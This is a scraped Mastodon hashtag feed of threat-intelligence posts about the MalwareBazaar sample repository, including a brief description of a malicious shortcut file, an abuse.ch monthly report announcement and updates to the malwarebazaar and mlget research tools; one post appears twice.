0xdf · @0xdf
448 followers · 19 posts · Server infosec.exchangeA lnk file that downloads JavaScript from #malwarebazaar. This one uses lolbins like certutil for base64 decode, bitsadmin for download, and colorcpl for file copy. Also lots of JavaScript charcode obfuscation.
abuse.ch · @abuse_ch
324 followers · 11 posts · Server ioc.exchange
We have just published our report for December 2022, providing you some insights into malware trends across our platforms, including #URLhaus and #MalwareBazaar 🪲🔎👀
Nils Kuhnert · @0x3c7
89 followers · 4 posts · Server infosec.exchange
Just pushed an update for malwarebazaar, my little Python/CLI API client for @abuse_ch #MalwareBazaar. Originally just used for querying bazaar itself, now it's possible to query #YARAify, too. Additionally the CLI was updated to provide a richer (haha - https://rich.readthedocs.io/) output. You can find the new version on Github (https://github.com/3c7/bazaar/releases/tag/v0.2.0) and on PyPI via `malwarebazaar`.
#malwarebazaar #yaraify #threatintel #malware
avallach · @xorhex
118 followers · 62 posts · Server infosec.exchange
Some additions, improvements, and fixes coming to #mlget soon.
https://github.com/xorhex/mlget
Mlget is a #malware downloader, allowing you to download from the following services:
#capesandbox
#filescanio
#hybridanalysis
#inquests
#joesandbox
#malpedia
#malshare / @malshare
#malwarebazaar
#mwdb
#objectivesee
#polyswarm
#triage
#unpacme
#urlscanio <-- NEW ADDITION COMING
#vt /#virustotal
#vxshare / @VXShare
It can also download and automatically upload to an MWDB instance of your choice.
#mlget #malware #capesandbox #filescanio #HybridAnalysis #Inquests #joesandbox #malpedia #malshare #malwarebazaar #mwdb #objectivesee #polyswarm #triage #unpacme #urlscanio #vt #vxshare
avallach · @xorhex
160 followers · 162 posts · Server infosec.exchangeSome additions, improvements, and fixes coming to #mlget soon.
https://github.com/xorhex/mlget
Mlget is a #malware downloader, allowing you to download from the following services:
#capesandbox
#filescanio
#hybridanalysis
#inquests
#joesandbox
#malpedia
#malshare / @malshare
#malwarebazaar
#mwdb
#objectivesee
#polyswarm
#triage
#unpacme
#urlscanio <-- NEW ADDITION COMING
#vt /#virustotal
#vxshare / @VXShare
It can also download and automatically upload to an MWDB instance of your choice.
#mlget #malware #capesandbox #filescanio #HybridAnalysis #Inquests #joesandbox #malpedia #malshare #malwarebazaar #mwdb #objectivesee #polyswarm #triage #unpacme #urlscanio #vt #vxshare
Frehi · @frehi
66 followers · 534 posts · Server fosstodon.orgHm, @abuse_ch requires a Twitter account to log in to #Malwarebazaar. I don't have that any more.